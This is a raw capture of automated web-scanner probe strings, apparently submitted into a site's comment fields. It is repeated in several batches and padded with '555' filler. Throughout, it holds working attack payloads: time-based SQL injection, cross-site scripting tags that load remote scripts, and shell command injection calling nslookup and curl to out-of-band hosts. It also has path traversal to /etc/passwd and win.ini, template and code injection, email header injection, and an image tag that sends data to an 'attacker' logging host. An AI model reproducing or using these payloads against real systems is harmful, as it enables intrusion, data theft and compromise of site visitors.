555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
NewsCommentAdd
/../../../../../../../../../../windows/system32/BITSADMIN.exe
NewsCommentAdd/.
"+"A".concat(70-3).concat(22*4).concat(113).concat(73).concat(105).concat(68)+(require"socket"Socket.gethostbyname("hitcj"+"nwiqvtlia771f.bxss.me.")[3].to_s)+"
59J34J61
'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(98).concat(81)+(require'socket'Socket.gethostbyname('hitnv'+'uxenmjlgcd526.bxss.me.')[3].to_s)+'
response.write(9510129*9742990)
'+response.write(9510129*9742990)+'
"+response.write(9510129*9742990)+"
555<esi:include src="http://bxss.me/rpb.png"/>
echo rnsxje$()\ bpbmik\nz^xyu||a #' &echo rnsxje$()\ bpbmik\nz^xyu||a #|" &echo rnsxje$()\ bpbmik\nz^xyu||a #
555bcc:009247.4910-53843.4910.dde8c.20036.2@bxss.me
&echo mktocc$()\ wrmeto\nz^xyu||a #' &echo mktocc$()\ wrmeto\nz^xyu||a #|" &echo mktocc$()\ wrmeto\nz^xyu||a #
to@example.com>bcc:009247.4910-53844.4910.dde8c.20036.2@bxss.me
|echo tuanas$()\ qflqld\nz^xyu||a #' |echo tuanas$()\ qflqld\nz^xyu||a #|" |echo tuanas$()\ qflqld\nz^xyu||a #
${9999246+10000157}
(nslookup -q=cname hitxazmgwagpy7ac20.bxss.me||curl hitxazmgwagpy7ac20.bxss.me))
$(nslookup -q=cname hitzxgiwsgtpo920a4.bxss.me||curl hitzxgiwsgtpo920a4.bxss.me)
../../../../../../../../../../../../../../etc/passwd
&nslookup -q=cname hitzosayzukefda7a8.bxss.me&'\"`0&nslookup -q=cname hitzosayzukefda7a8.bxss.me&`'
'.gethostbyname(lc('hitdz'.'ztqmymzq97973.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(72).chr(116).chr(65).'
../../../../../../../../../../../../../../windows/win.ini
&(nslookup -q=cname hittngfeytmaf4ddb5.bxss.me||curl hittngfeytmaf4ddb5.bxss.me)&'\"`0&(nslookup -q=cname hittngfeytmaf4ddb5.bxss.me||curl hittngfeytmaf4ddb5.bxss.me)&`'
|(nslookup -q=cname hittvcucypignc90e4.bxss.me||curl hittvcucypignc90e4.bxss.me)
file:///etc/passwd
".gethostbyname(lc("hithf"."qzytyncg97b54.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(65).chr(120).chr(68)."
-1 OR 2+709-709-1=0+0+0+1 --
`(nslookup -q=cname hitlbkkgbvdque90b9.bxss.me||curl hitlbkkgbvdque90b9.bxss.me)`
../555
)
;(nslookup -q=cname hitwhpwwhcltw9f4cb.bxss.me||curl hitwhpwwhcltw9f4cb.bxss.me)|(nslookup -q=cname hitwhpwwhcltw9f4cb.bxss.me||curl hitwhpwwhcltw9f4cb.bxss.me)&(nslookup -q=cname hitwhpwwhcltw9f4cb.bxss.me||curl hitwhpwwhcltw9f4cb.bxss.me)
-1 OR 2+217-217-1=0+0+0+1
!(()&&!|*|*|
-1' OR 2+464-464-1=0+0+0+1 --
HttP://bxss.me/t/xss.html?%00
^(#$!@#$)(()))******
-1' OR 2+642-642-1=0+0+0+1 or 'vhS3gRWn'='
bxss.me/t/xss.html?%00
-1" OR 2+462-462-1=0+0+0+1 --
'"
<!--
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
';print(md5(31337));$a='
-1; waitfor delay '0:0:15' --
";print(md5(31337));$a="
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
${@print(md5(31337))}
1BqIc9Dc56O
1 waitfor delay '0:0:15' --
${@print(md5(31337))}\
uaqcXT7k'; waitfor delay '0:0:15' --
'.print(md5(31337)).'
jEHYFALM'); waitfor delay '0:0:15' --
'"()
a21yL3Og')); waitfor delay '0:0:15' --
555'&&sleep(27*1000)*trewnw&&'
-5 OR 281=(SELECT 281 FROM PG_SLEEP(15))--
555"&&sleep(27*1000)*tdgodk&&"
-5) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
555'||sleep(27*1000)*geckrt||'
-1)) OR 598=(SELECT 598 FROM PG_SLEEP(15))--
555"||sleep(27*1000)*jvbact||"
Iysusqxo' OR 473=(SELECT 473 FROM PG_SLEEP(15))--
LKl4Q2Qq') OR 918=(SELECT 918 FROM PG_SLEEP(15))--
555&n949876=v941279
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1kpusIFp')) OR 975=(SELECT 975 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Http://bxss.me/t/fit.txt
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
http://bxss.me/t/fit.txt?.jpg
1'"
/etc/shells
@@H0CMX
c:/windows/win.ini
bxss.me
555'"()&%<zzz><ScRiPt >oSNp(9494)</ScRiPt>
'"()&%<zzz><ScRiPt >oSNp(9673)</ScRiPt>
5559623053
bfg8115<s1﹥s2ʺs3ʹhjl8115
bfgx7327%C0%BEz1%C0%BCz2a%90bcxhjl7327
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >oSNp(9049)</ScRiPt>
555<WA24DS>QSHHS[!+!]</WA24DS>
555<script>oSNp(9012)</script>
555<ScR<ScRiPt>IpT>oSNp(9963)</sCr<ScRiPt>IpT>
555<ScRiPt >oSNp(9406)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9146></ScRiPt>
555<isindex type=image src=1 onerror=oSNp(9455)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9107'>
555<body onload=oSNp(9385)>
555<img src=//xss.bxss.me/t/dot.gif onload=oSNp(9256)>
555<img src=xyz OnErRor=oSNp(9070)>
555<img/src=">" onerror=alert(9504)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%53%4E%70%289016%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\oSNp(9080)\u003C/sCripT\u003E
555<ScRiPt>oSNp(9178)</sCripT>
%F6<img zzz onmouseover=oSNp(95631) //%F6>
555<input autofocus onfocus=oSNp(9529)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(oSNp(9288))}
555eKTDr<ScRiPt >oSNp(9051)</ScRiPt>
555<WB4ALZ>7WVSR[!+!]</WB4ALZ>
555<ifRAme sRc=9948.com></IfRamE>
555<a548gWc x=9624>
555<img sRc='http://attacker-9153/log.php?
555<aTjtam1<
555'"()&%<zzz><ScRiPt >Ydhn(9946)</ScRiPt>
'"()&%<zzz><ScRiPt >Ydhn(9874)</ScRiPt>
5559506993
bfg6961<s1﹥s2ʺs3ʹhjl6961
bfgx3237%C0%BEz1%C0%BCz2a%90bcxhjl3237
555<ScRiPt >Ydhn(9990)</ScRiPt>
555<WC8G1Y>OP1DX[!+!]</WC8G1Y>
555<script>Ydhn(9425)</script>
555<ScR<ScRiPt>IpT>Ydhn(9955)</sCr<ScRiPt>IpT>
555<ScRiPt >Ydhn(9598)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9565></ScRiPt>
555<isindex type=image src=1 onerror=Ydhn(9107)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9531'>
555<body onload=Ydhn(9426)>
555<img src=//xss.bxss.me/t/dot.gif onload=Ydhn(9987)>
555<img src=xyz OnErRor=Ydhn(9374)>
555<img/src=">" onerror=alert(9778)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%59%64%68%6E%289298%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Ydhn(9640)\u003C/sCripT\u003E
555<ScRiPt>Ydhn(9111)</sCripT>
%F6<img zzz onmouseover=Ydhn(96041) //%F6>
555<input autofocus onfocus=Ydhn(9745)>
555}body{zzz:Expre/**/SSion(Ydhn(9891))}
555ffRZf<ScRiPt >Ydhn(9396)</ScRiPt>
555<W1GKKZ>JVFA8[!+!]</W1GKKZ>
555<ifRAme sRc=9708.com></IfRamE>
555<aTzwl70 x=9878>
555<img sRc='http://attacker-9192/log.php?
555<a2nzulK<
"+"A".concat(70-3).concat(22*4).concat(114).concat(86).concat(120).concat(65)+(require"socket"Socket.gethostbyname("hitwu"+"zelzcuki7f5ae.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(103).concat(68).concat(104).concat(69)+(require'socket'Socket.gethostbyname('hithu'+'vryxiqoh94f77.bxss.me.')[3].to_s)+'
response.write(9226309*9319962)
'+response.write(9226309*9319962)+'
"+response.write(9226309*9319962)+"
555bcc:009247.4995-46594.4995.8c842.20036.2@bxss.me
976K8B9j
to@example.com>bcc:009247.4995-46595.4995.8c842.20036.2@bxss.me
echo pdejby$()\ fjgebf\nz^xyu||a #' &echo pdejby$()\ fjgebf\nz^xyu||a #|" &echo pdejby$()\ fjgebf\nz^xyu||a #
&echo wlmbfw$()\ cvfose\nz^xyu||a #' &echo wlmbfw$()\ cvfose\nz^xyu||a #|" &echo wlmbfw$()\ cvfose\nz^xyu||a #
|echo yubuxe$()\ ytjtbu\nz^xyu||a #' |echo yubuxe$()\ ytjtbu\nz^xyu||a #|" |echo yubuxe$()\ ytjtbu\nz^xyu||a #
(nslookup -q=cname hitgbrzuziudf3aee5.bxss.me||curl hitgbrzuziudf3aee5.bxss.me))
${9999280+10000222}
$(nslookup -q=cname hitfwkehhzcpee51ca.bxss.me||curl hitfwkehhzcpee51ca.bxss.me)
&nslookup -q=cname hitdogpzrmdobcf928.bxss.me&'\"`0&nslookup -q=cname hitdogpzrmdobcf928.bxss.me&`'
'.gethostbyname(lc('hitkp'.'zcwvuqvle681a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(114).chr(73).'
".gethostbyname(lc("hitbu"."wpzzgfrfbb058.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(82).chr(112).chr(74)."
&(nslookup -q=cname hitzlqozrvmnh35773.bxss.me||curl hitzlqozrvmnh35773.bxss.me)&'\"`0&(nslookup -q=cname hitzlqozrvmnh35773.bxss.me||curl hitzlqozrvmnh35773.bxss.me)&`'
|(nslookup -q=cname hitmbhjtycohr7beae.bxss.me||curl hitmbhjtycohr7beae.bxss.me)
`(nslookup -q=cname hitzwxautdyaj445e9.bxss.me||curl hitzwxautdyaj445e9.bxss.me)`
;(nslookup -q=cname hitwgeeuadyne49e36.bxss.me||curl hitwgeeuadyne49e36.bxss.me)|(nslookup -q=cname hitwgeeuadyne49e36.bxss.me||curl hitwgeeuadyne49e36.bxss.me)&(nslookup -q=cname hitwgeeuadyne49e36.bxss.me||curl hitwgeeuadyne49e36.bxss.me)
1C2Y7gcgbaO
-1 OR 2+587-587-1=0+0+0+1 --
555'&&sleep(27*1000)*mgfubh&&'
-1 OR 2+348-348-1=0+0+0+1
555'"()&%<zzz><ScRiPt >MoDo(9547)</ScRiPt>
555"&&sleep(27*1000)*qdnqhn&&"
-1' OR 2+507-507-1=0+0+0+1 --
555'||sleep(27*1000)*bagyph||'
-1' OR 2+13-13-1=0+0+0+1 or 'zJ6ybyju'='
555&n900867=v970814
555"||sleep(27*1000)*bqhfab||"
-1" OR 2+611-611-1=0+0+0+1 --
'"()&%<zzz><ScRiPt >MoDo(9636)</ScRiPt>
5559814510
P2eeGYC5'; waitfor delay '0:0:15' --
D1ayOlXE'); waitfor delay '0:0:15' --
QP1FkKBn')); waitfor delay '0:0:15' --
-5 OR 24=(SELECT 24 FROM PG_SLEEP(15))--
-5) OR 946=(SELECT 946 FROM PG_SLEEP(15))--
-1)) OR 303=(SELECT 303 FROM PG_SLEEP(15))--
haEtQS4x' OR 922=(SELECT 922 FROM PG_SLEEP(15))--
kAgB8euB') OR 666=(SELECT 666 FROM PG_SLEEP(15))--
qMZfrfgu')) OR 550=(SELECT 550 FROM PG_SLEEP(15))--
@@p69cj
bfg1794<s1﹥s2ʺs3ʹhjl1794
bfgx1255%C0%BEz1%C0%BCz2a%90bcxhjl1255
555<ScRiPt >MoDo(9980)</ScRiPt>
555<WUGGYO>GUH5A[!+!]</WUGGYO>
555<script>MoDo(9212)</script>
555<ScR<ScRiPt>IpT>MoDo(9652)</sCr<ScRiPt>IpT>
555<ScRiPt >MoDo(9516)</ScRiPt>
555<isindex type=image src=1 onerror=MoDo(9757)>
555<body onload=MoDo(9485)>
555<img src=//xss.bxss.me/t/dot.gif onload=MoDo(9970)>
555<img src=xyz OnErRor=MoDo(9016)>
555<img/src=">" onerror=alert(9893)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%6F%44%6F%289865%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\MoDo(9923)\u003C/sCripT\u003E
555<ScRiPt>MoDo(9913)</sCripT>
%F6<img zzz onmouseover=MoDo(93271) //%F6>
555<input autofocus onfocus=MoDo(9494)>
555}body{zzz:Expre/**/SSion(MoDo(9765))}
555wMJ0Y<ScRiPt >MoDo(9856)</ScRiPt>
555<W9TBRJ>JQACW[!+!]</W9TBRJ>
555<ifRAme sRc=9502.com></IfRamE>
555<aQ7ZMBM x=9626>
555<img sRc='http://attacker-9400/log.php?
555<agTdM9U<
555'"()&%<zzz><ScRiPt >ww0j(9513)</ScRiPt>
'"()&%<zzz><ScRiPt >ww0j(9823)</ScRiPt>
5559405766
bfg6329<s1﹥s2ʺs3ʹhjl6329
bfgx10009%C0%BEz1%C0%BCz2a%90bcxhjl10009
555<ScRiPt >ww0j(9674)</ScRiPt>
555<WBZJNM>EBTCR[!+!]</WBZJNM>
555<script>ww0j(9813)</script>
555<ScR<ScRiPt>IpT>ww0j(9298)</sCr<ScRiPt>IpT>
555<ScRiPt >ww0j(9176)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9863></ScRiPt>
555<isindex type=image src=1 onerror=ww0j(9206)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9880'>
555<body onload=ww0j(9840)>
555<img src=//xss.bxss.me/t/dot.gif onload=ww0j(9338)>
555<img src=xyz OnErRor=ww0j(9125)>
555<img/src=">" onerror=alert(9183)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%77%30%6A%289076%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\ww0j(9068)\u003C/sCripT\u003E
555<ScRiPt>ww0j(9424)</sCripT>
%F6<img zzz onmouseover=ww0j(96541) //%F6>
555<input autofocus onfocus=ww0j(9508)>
555}body{zzz:Expre/**/SSion(ww0j(9619))}
555COAVl<ScRiPt >ww0j(9330)</ScRiPt>
555<W9UT2M>GX47U[!+!]</W9UT2M>
555<ifRAme sRc=9233.com></IfRamE>
555<aaQjqHf x=9959>
555<img sRc='http://attacker-9788/log.php?
555<aMApQZw<
response.write(9275593*9973358)
'+response.write(9275593*9973358)+'
"+"A".concat(70-3).concat(22*4).concat(104).concat(89).concat(112).concat(74)+(require"socket"Socket.gethostbyname("hitwc"+"sioxrtai5695e.bxss.me.")[3].to_s)+"
"+response.write(9275593*9973358)+"
'+'A'.concat(70-3).concat(22*4).concat(111).concat(71).concat(113).concat(84)+(require'socket'Socket.gethostbyname('hittj'+'wtvlivgje4323.bxss.me.')[3].to_s)+'
H6pI1z6R
555bcc:009247.5083-44098.5083.328f2.20036.2@bxss.me
to@example.com>bcc:009247.5083-44099.5083.328f2.20036.2@bxss.me
echo qbwswb$()\ cwpgsh\nz^xyu||a #' &echo qbwswb$()\ cwpgsh\nz^xyu||a #|" &echo qbwswb$()\ cwpgsh\nz^xyu||a #
${9999223+9999966}
&echo ekaapb$()\ bgmgfi\nz^xyu||a #' &echo ekaapb$()\ bgmgfi\nz^xyu||a #|" &echo ekaapb$()\ bgmgfi\nz^xyu||a #
|echo sflegb$()\ dvalog\nz^xyu||a #' |echo sflegb$()\ dvalog\nz^xyu||a #|" |echo sflegb$()\ dvalog\nz^xyu||a #
'.gethostbyname(lc('hityq'.'nhtuufxg7ae9c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(90).chr(113).chr(76).'
(nslookup -q=cname hitfmhpntgizy879cd.bxss.me||curl hitfmhpntgizy879cd.bxss.me))
".gethostbyname(lc("hitlz"."xcfekdkw590c0.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(76).chr(112).chr(71)."
$(nslookup -q=cname hitglspewbivmaa2fa.bxss.me||curl hitglspewbivmaa2fa.bxss.me)
&nslookup -q=cname hitwdrncweqyy573c1.bxss.me&'\"`0&nslookup -q=cname hitwdrncweqyy573c1.bxss.me&`'
&(nslookup -q=cname hitojqmddgsxc378f2.bxss.me||curl hitojqmddgsxc378f2.bxss.me)&'\"`0&(nslookup -q=cname hitojqmddgsxc378f2.bxss.me||curl hitojqmddgsxc378f2.bxss.me)&`'
|(nslookup -q=cname hittqgdrqvpqy12d39.bxss.me||curl hittqgdrqvpqy12d39.bxss.me)
`(nslookup -q=cname hitmzeiirweui3207e.bxss.me||curl hitmzeiirweui3207e.bxss.me)`
;(nslookup -q=cname hitivkzuchydj44cec.bxss.me||curl hitivkzuchydj44cec.bxss.me)|(nslookup -q=cname hitivkzuchydj44cec.bxss.me||curl hitivkzuchydj44cec.bxss.me)&(nslookup -q=cname hitivkzuchydj44cec.bxss.me||curl hitivkzuchydj44cec.bxss.me)
-1 OR 2+531-531-1=0+0+0+1 --
-1 OR 2+779-779-1=0+0+0+1
-1' OR 2+369-369-1=0+0+0+1 --
-1' OR 2+497-497-1=0+0+0+1 or 'INHYjiev'='
-1" OR 2+59-59-1=0+0+0+1 --
1DrYLycIhVO
555&n935754=v987532
tMX26P3x'; waitfor delay '0:0:15' --
555'"()&%<zzz><ScRiPt >UhPc(9575)</ScRiPt>
9lrUxbGi'); waitfor delay '0:0:15' --
DjvU52RM')); waitfor delay '0:0:15' --
-5 OR 515=(SELECT 515 FROM PG_SLEEP(15))--
'"()&%<zzz><ScRiPt >UhPc(9156)</ScRiPt>
-5) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
555'&&sleep(27*1000)*yuctns&&'
-5) OR 478=(SELECT 478 FROM PG_SLEEP(3))--
555"&&sleep(27*1000)*cfzrdm&&"
-1)) OR 717=(SELECT 717 FROM PG_SLEEP(15))--
555'||sleep(27*1000)*ryeetm||'
5E7ZlHLy' OR 948=(SELECT 948 FROM PG_SLEEP(15))--
5559523045
555"||sleep(27*1000)*nkuahe||"
lIFUxzUY') OR 893=(SELECT 893 FROM PG_SLEEP(15))--
kP3Ai5Uq')) OR 73=(SELECT 73 FROM PG_SLEEP(15))--
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'
@@wtuOF
bfg4964<s1﹥s2ʺs3ʹhjl4964
bfgx10306%C0%BEz1%C0%BCz2a%90bcxhjl10306
555<ScRiPt >UhPc(9217)</ScRiPt>
555<WJFVYK>UDBJO[!+!]</WJFVYK>
555<script>UhPc(9744)</script>
555<ScR<ScRiPt>IpT>UhPc(9194)</sCr<ScRiPt>IpT>
555<ScRiPt >UhPc(9380)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9331></ScRiPt>
555<isindex type=image src=1 onerror=UhPc(9949)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9234'>
555<body onload=UhPc(9412)>
555<img src=//xss.bxss.me/t/dot.gif onload=UhPc(9703)>
555<img src=xyz OnErRor=UhPc(9242)>
555<img/src=">" onerror=alert(9029)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%55%68%50%63%289459%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\UhPc(9035)\u003C/sCripT\u003E
555<ScRiPt>UhPc(9721)</sCripT>
%F6<img zzz onmouseover=UhPc(91201) //%F6>
555<input autofocus onfocus=UhPc(9421)>
555}body{zzz:Expre/**/SSion(UhPc(9748))}
5559dhlE<ScRiPt >UhPc(9478)</ScRiPt>
555<WCL7FD>HAFGS[!+!]</WCL7FD>
555<ifRAme sRc=9213.com></IfRamE>
555<ayqQKr6 x=9685>
555<img sRc='http://attacker-9131/log.php?
555<a3hxVan<
555'"()&%<zzz><ScRiPt >dJ5X(9143)</ScRiPt>
'"()&%<zzz><ScRiPt >dJ5X(9134)</ScRiPt>
5559226003
bfg7417<s1﹥s2ʺs3ʹhjl7417
bfgx4036%C0%BEz1%C0%BCz2a%90bcxhjl4036
555<ScRiPt >dJ5X(9745)</ScRiPt>
555<W8SBWO>H7NRZ[!+!]</W8SBWO>
555<script>dJ5X(9690)</script>
555<ScR<ScRiPt>IpT>dJ5X(9122)</sCr<ScRiPt>IpT>
555<ScRiPt >dJ5X(9901)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9921></ScRiPt>
555<isindex type=image src=1 onerror=dJ5X(9607)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9179'>
555<body onload=dJ5X(9380)>
555<img src=//xss.bxss.me/t/dot.gif onload=dJ5X(9498)>
555<img src=xyz OnErRor=dJ5X(9132)>
555<img/src=">" onerror=alert(9560)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%64%4A%35%58%289477%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\dJ5X(9717)\u003C/sCripT\u003E
555<ScRiPt>dJ5X(9594)</sCripT>
%F6<img zzz onmouseover=dJ5X(95371) //%F6>
555<input autofocus onfocus=dJ5X(9200)>
555}body{zzz:Expre/**/SSion(dJ5X(9827))}
555eBbJ0<ScRiPt >dJ5X(9493)</ScRiPt>
555<WOJRTT>NOVDV[!+!]</WOJRTT>
555<ifRAme sRc=9142.com></IfRamE>
555<a83Uz1g x=9298>
555<img sRc='http://attacker-9931/log.php?
555<aysVqJX<
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
555
NewsCommentAdd
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
NewsCommentAdd/.
555
555
"+"A".concat(70-3).concat(22*4).concat(113).concat(73).concat(105).concat(68)+(require"socket"
Socket.gethostbyname("hitcj"+"nwiqvtlia771f.bxss.me.")[3].to_s)+"
59J34J61
555
555
'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(98).concat(81)+(require'socket'
Socket.gethostbyname('hitnv'+'uxenmjlgcd526.bxss.me.')[3].to_s)+'
555
555
555
555
response.write(9510129*9742990)
'+response.write(9510129*9742990)+'
"+response.write(9510129*9742990)+"
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
echo rnsxje$()\ bpbmik\nz^xyu||a #' &echo rnsxje$()\ bpbmik\nz^xyu||a #|" &echo rnsxje$()\ bpbmik\nz^xyu||a #
555
555
bcc:009247.4910-53843.4910.dde8c.20036.2@bxss.me
&echo mktocc$()\ wrmeto\nz^xyu||a #' &echo mktocc$()\ wrmeto\nz^xyu||a #|" &echo mktocc$()\ wrmeto\nz^xyu||a #
555
to@example.com>
bcc:009247.4910-53844.4910.dde8c.20036.2@bxss.me
|echo tuanas$()\ qflqld\nz^xyu||a #' |echo tuanas$()\ qflqld\nz^xyu||a #|" |echo tuanas$()\ qflqld\nz^xyu||a #
555
${9999246+10000157}
555
555
(nslookup -q=cname hitxazmgwagpy7ac20.bxss.me||curl hitxazmgwagpy7ac20.bxss.me))
555
555
$(nslookup -q=cname hitzxgiwsgtpo920a4.bxss.me||curl hitzxgiwsgtpo920a4.bxss.me)
555
../../../../../../../../../../../../../../etc/passwd
555
&nslookup -q=cname hitzosayzukefda7a8.bxss.me&'\"`0&nslookup -q=cname hitzosayzukefda7a8.bxss.me&`'
'.gethostbyname(lc('hitdz'.'ztqmymzq97973.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(72).chr(116).chr(65).'
../../../../../../../../../../../../../../windows/win.ini
555
&(nslookup -q=cname hittngfeytmaf4ddb5.bxss.me||curl hittngfeytmaf4ddb5.bxss.me)&'\"`0&(nslookup -q=cname hittngfeytmaf4ddb5.bxss.me||curl hittngfeytmaf4ddb5.bxss.me)&`'
555
|(nslookup -q=cname hittvcucypignc90e4.bxss.me||curl hittvcucypignc90e4.bxss.me)
file:///etc/passwd
".gethostbyname(lc("hithf"."qzytyncg97b54.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(65).chr(120).chr(68)."
555
555
555
555
-1 OR 2+709-709-1=0+0+0+1 --
`(nslookup -q=cname hitlbkkgbvdque90b9.bxss.me||curl hitlbkkgbvdque90b9.bxss.me)`
555
../555
)
555
;(nslookup -q=cname hitwhpwwhcltw9f4cb.bxss.me||curl hitwhpwwhcltw9f4cb.bxss.me)|(nslookup -q=cname hitwhpwwhcltw9f4cb.bxss.me||curl hitwhpwwhcltw9f4cb.bxss.me)&(nslookup -q=cname hitwhpwwhcltw9f4cb.bxss.me||curl hitwhpwwhcltw9f4cb.bxss.me)
-1 OR 2+217-217-1=0+0+0+1
555
555
!(()&&!|*|*|
555
-1' OR 2+464-464-1=0+0+0+1 --
555
HttP://bxss.me/t/xss.html?%00
^(#$!@#$)(()))******
555
-1' OR 2+642-642-1=0+0+0+1 or 'vhS3gRWn'='
555
bxss.me/t/xss.html?%00
555
555
-1" OR 2+462-462-1=0+0+0+1 --
555
'"
555
555
555
555
555
<!--
555
555
if(now()=sysdate(),sleep(15),0)
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
';print(md5(31337));$a='
555
-1; waitfor delay '0:0:15' --
555
555
";print(md5(31337));$a="
-1); waitfor delay '0:0:15' --
555
555
-1)); waitfor delay '0:0:15' --
${@print(md5(31337))}
555
1BqIc9Dc56O
555
1 waitfor delay '0:0:15' --
${@print(md5(31337))}\
555
555
555
555
uaqcXT7k'; waitfor delay '0:0:15' --
'.print(md5(31337)).'
555
jEHYFALM'); waitfor delay '0:0:15' --
555
555
'"()
555
a21yL3Og')); waitfor delay '0:0:15' --
555
555'&&sleep(27*1000)*trewnw&&'
555
-5 OR 281=(SELECT 281 FROM PG_SLEEP(15))--
555
555"&&sleep(27*1000)*tdgodk&&"
555
-5) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
555'||sleep(27*1000)*geckrt||'
555
-1)) OR 598=(SELECT 598 FROM PG_SLEEP(15))--
555"||sleep(27*1000)*jvbact||"
555
Iysusqxo' OR 473=(SELECT 473 FROM PG_SLEEP(15))--
555
555
LKl4Q2Qq') OR 918=(SELECT 918 FROM PG_SLEEP(15))--
555&n949876=v941279
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1kpusIFp')) OR 975=(SELECT 975 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
Http://bxss.me/t/fit.txt
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
http://bxss.me/t/fit.txt?.jpg
555
1'"
555
555
555
/etc/shells
555
555
@@H0CMX
555
555
555
555
c:/windows/win.ini
555
555
555
555
555
555
bxss.me
555
555
555
555
555
555'"()&%<zzz><ScRiPt >oSNp(9494)</ScRiPt>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()&%<zzz><ScRiPt >oSNp(9673)</ScRiPt>
555
555
555
555
555
555
555
555
5559623053
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bfg8115<s1﹥s2ʺs3ʹhjl8115
555
555
555
bfgx7327%C0%BEz1%C0%BCz2a%90bcxhjl7327
555
555
555
555
555
555
555
<%={{={@{#{${dfb}}%>
555
555
555
555
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >oSNp(9049)</ScRiPt>
555<WA24DS>QSHHS[!+!]</WA24DS>
555<script>oSNp(9012)</script>
555<ScR<ScRiPt>IpT>oSNp(9963)</sCr<ScRiPt>IpT>
555<ScRiPt
>oSNp(9406)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9146></ScRiPt>
